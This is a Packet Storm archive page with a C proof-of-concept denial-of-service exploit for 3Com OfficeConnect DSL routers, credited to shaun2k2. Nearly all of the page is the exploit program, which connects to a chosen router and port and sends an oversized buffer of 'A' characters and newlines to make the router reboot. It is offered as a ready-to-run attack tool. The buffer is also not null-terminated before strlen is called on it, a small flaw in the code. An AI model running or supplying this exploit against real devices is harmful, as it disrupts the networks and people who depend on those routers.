Proof of concept DoS exploit for 3Com OfficeConnect DSL Routers. Successful exploitation of the vulnerability should cause the router to reboot.
254023ca8d4768c04c5c20cfa49d209a6bbc5b70b7a80ccd6bf8833bff56ebcb/* 3com-DoS.c
*
* PoC DoS exploit for 3Com OfficeConnect DSL Routers. This PoC exploit the
* vulnerability documented at: <http://www.securityfocus.com/bid/8248>,
* discovered by David F. Madrid.
*
* Successful exploitation of the vulnerability should cause the router to
* reboot. It is not believed that arbitrary code execution is possible -
* check advisory for more information.
*
* -shaun2k2
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
int main(int argc, char *argv[]) {
if(argc < 3) {
printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <shaunige@yahoo.co.uk>\n\n");
printf("Usage: 3comDoS <3com_router> <port>\n");
exit(-1);
}
int sock;
char explbuf[521];
struct sockaddr_in dest;
struct hostent *he;
if((he = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve %s!\n", argv[1]);
exit(-1);
}
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}
printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <shaunige@yahoo.co.uk>\n\n");
dest.sin_addr = *((struct in_addr *)he->h_addr);
dest.sin_port = htons(atoi(argv[2]));
dest.sin_family = AF_INET;
printf("[+] Crafting exploit buffer.\n");
memset(explbuf, 'A', 512);
memcpy(explbuf+512, "\n\n\n\n\n\n\n\n", 8);
if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
perror("connect()");
exit(-1);
}
printf("[+] Connected...Sending exploit buffer!\n");
send(sock, explbuf, strlen(explbuf), 0);
sleep(2);
close(sock);
printf("\n[+] Exploit buffer sent!\n");
return(0);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed